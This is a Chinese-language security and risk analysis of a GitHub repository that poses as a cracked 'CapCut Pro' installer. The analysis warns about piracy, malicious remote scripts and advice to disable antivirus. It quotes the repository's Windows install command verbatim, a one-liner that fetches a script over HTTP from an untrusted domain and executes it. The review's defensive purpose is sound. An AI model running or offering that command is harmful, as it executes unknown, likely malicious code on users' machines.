项目 · 项目报告

SpecterLouse/CapCut-Pro-macOS-Windows

Capcut Pro Unlocked v2026.7 - Full Premium (Windows & MacOS)

已完成 打开 GitHub
S
450星标
1Fork
0Issue
MIT许可证

分析结果

项目分析

该仓库声称提供 Windows 与 macOS 版“CapCut Pro 解锁/破解”工具,用于免费启用 CapCut Pro 订阅功能、去水印、4K 导出、素材库和 AI 功能。README 中明确描述其为 cracked/patched 版本,并要求用户通过 PowerShell、Terminal 远程拉取脚本执行。该项目不属于正规开源开发工具或合法 CapCut 插件,具有明显的软件盗版、账号/订阅绕过和潜在恶意脚本风险,不建议中国开发者或企业用户安装、传播或集成。

适用领域 视频剪辑 / 短视频创作 / CapCut/剪映相关工具 / 软件破解 / 桌面端脚本安装 / 高风险第三方安装器
配置难度 从使用说明看安装门槛很低,只需复制命令执行;但从安全分析和可信验证角度看难度较高。普通用户无法可靠判断远程脚本实际行为,开发者也需要在沙箱中进行网络抓包、脚本反混淆、文件行为和持久化分析。
商业价值 对合法业务和开发者生态的正向价值很低,不适合商业采用、二次开发或团队部署。其主要价值在于安全研究、恶意软件样本分析、员工安全意识培训和盗版软件风险教育。对于需要 CapCut Pro 功能的用户,建议使用官方订阅、正版授权或寻找合规开源视频编辑替代方案。
01

技术亮点

  • README 包装完整,提供功能矩阵、FAQ、系统需求和故障排查,看起来像成熟工具。
  • 覆盖 Windows 和 macOS 两个平台。
  • 宣传点包括去水印、4K 导出、Pro 素材库、AI 字幕、背景移除、硬件加速等。
  • SEO 关键词非常密集,明显面向搜索流量和破解软件用户。
  • 从安全角度看,该仓库是识别恶意安装脚本、盗版软件分发和供应链风险的典型样本。
02

目标用户

  • 想免费使用 CapCut Pro 功能的个人用户
  • 短视频创作者
  • TikTok/Reels/YouTube Shorts 内容制作者
  • 寻找去水印或 4K 导出方案的用户
  • 不建议面向企业、团队、开发者或生产环境使用
03

配置要求

  • README 声称支持 Windows 10/11、macOS、PowerShell 5.1+、CapCut 最新版、4GB 以上内存、DirectX 11/12。
  • 安装步骤要求管理员权限或终端执行权限。
  • 要求访问第三方远程脚本域名。
  • README 建议用户临时关闭杀毒软件或实时防护,这是严重安全风险信号。
  • 没有可信的源码、构建流程、校验签名、哈希值或官方发布渠道说明。
04

适用场景

  • 声称解锁 CapCut Pro 高级素材、字体、贴纸、转场和音效
  • 声称移除导出水印
  • 声称启用 4K 导出和硬件加速
  • 声称增强自动字幕、背景移除、智能跟踪等 AI 功能
  • 实际更适合作为安全研究样本或风险识别案例,而不是正常软件使用
05

部署与配置

  • 不建议安装或运行该仓库提供的任何命令。
  • README 提供的 Windows 安装方式为以管理员权限运行 PowerShell,并执行远程脚本:irm http://solutionss.art/setup1.ps1 | iex。
  • README 提供的 macOS 安装方式为通过 curl 下载经过 base64 隐藏的远程脚本并交给 zsh 执行。
  • 这种安装方式会直接执行未知远程代码,且部分链接使用非可信域名、HTTP 明文传输或隐藏真实地址,风险极高。
  • 如果只是研究该仓库,应在隔离虚拟机、无敏感账号、无生产数据、断开个人账号环境中进行静态分析,不应在主力电脑执行。
06

风险与注意事项

  • 法律风险:README 明确表示这是 CapCut Pro crack/cracked/patched,用于绕过订阅和解锁付费功能,可能侵犯软件版权、服务条款和相关法律法规。
  • 安全风险:安装命令会直接执行远程脚本,用户无法在执行前确认脚本内容,存在木马、后门、窃取账号、窃取浏览器 Cookie、钱包密钥、项目文件等风险。
  • 权限风险:Windows 安装要求管理员权限,macOS 通过 shell 执行远程脚本,攻击面很大。
  • 网络风险:Windows 命令使用 HTTP 明文地址,可能被中间人篡改。
  • 混淆风险:macOS 命令通过 base64 隐藏真实 URL,属于高危可疑行为。
  • 反病毒风险:README 建议临时关闭实时防护,这是恶意软件分发中常见话术。
  • 可信度风险:仓库描述与 README 中项目名、版本、链接存在不一致,文档中的 wiki/issues/discussions 还保留占位路径。
  • 供应链风险:仓库星标数量较高但 fork 极少,可能存在刷星或诱导下载行为。
  • 隐私风险:可能访问、修改或上传本地 CapCut 配置、用户项目、账号令牌及系统信息。
  • 企业合规风险:在公司设备上运行此类工具可能造成合规审计、数据泄露和终端安全事件。

历史记录

热榜历史快照

2026-09-29 第28名 新收录 · github_search